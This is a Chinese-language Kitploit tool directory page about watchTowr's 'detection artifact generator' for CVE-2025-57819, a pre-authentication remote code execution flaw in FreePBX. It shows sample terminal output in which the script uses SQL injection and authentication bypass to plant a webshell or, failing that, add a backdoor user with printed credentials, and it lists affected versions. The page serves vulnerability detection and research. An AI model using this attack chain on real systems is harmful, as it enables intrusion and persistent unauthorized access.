Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/watchtowrlabs/watchtowr-vs-freepbx-cve-2025-57819
漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubwatchtowrlabs/watchtowr-vs-freepbx-cve-2025-57819

watchTowr-vs-FreePBX-CVE-2025-57819

基于Python的检测工件生成器,针对CVE-2025-57819,利用FreePBX预认证RCE漏洞,通过SQL注入和认证绕过部署webshell或创建后门用户。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
28821年前Kitploit 审核通过
分享

CVE-2025-57819 FreePBX 预认证远程代码执行

FreePBX 预认证远程代码执行 1day 检测痕迹生成器工具

检测实战

检测痕迹生成器尝试上传 PHP 脚本,若上传失败则添加新用户。

root@kitploit:~
$ python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://freepbx.lab.local
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-FreePBX-CVE-2025-57819.py
        (*) CVE-2025-57819 检测痕迹生成器:FreePBX 认证绕过 + SQL 注入实现远程代码执行

          - watchTowr 的 Piotr 和 Sonny

[+] FreePBX CVE-2025-57819 检测痕迹生成器已启动
[+] 正在发送漏洞利用请求
[+] 等待 2 分钟,生成 DAG 脚本
[+] 存在漏洞 - 发现 Webshell:http://freepbx.lab.local/this-is-an-ioc-not-actually-watchTowr-pd3o125j59.php?cmd=hostname
[+] Cleaning.sh 恶意 cron_job - 请手动确认 asterisk.cron_jobs 表中没有恶意条目

若 PHP 脚本上传失败,则回退到基于用户的检测。它会添加一个“随机”用户名和“随机”12 字符密码。

root@kitploit:~
$ python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://freepbx.lab.local
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-FreePBX-CVE-2025-57819.py
        (*) CVE-2025-57819 检测痕迹生成器:FreePBX 认证绕过 + SQL 注入实现远程代码执行

          - watchTowr 的 Piotr 和 Sonny

[+] FreePBX CVE-2025-57819 检测痕迹生成器已启动
[+] 正在发送漏洞利用请求
[+] 等待 2 分钟,生成 DAG 脚本
[-] 未找到 Webshell - 回退到添加用户
[+] 添加用户:watchTowrm0njzhj0ii / CdEf2DWGpT8u
[+] 验证用户是否存在
[+] 存在漏洞:用户已添加

描述

此脚本尝试检测 FreePBX 是否存在 CVE-2025-57819 预认证远程代码执行漏洞。

受影响版本

< 15.0.66

< 16.0.89

< 17.0.3

关注 watchTowr 实验室

获取最新安全研究,请关注 watchTowr 实验室团队

  • https://labs.watchtowr.com/

  • https://x.com/watchtowrcyber

下载工具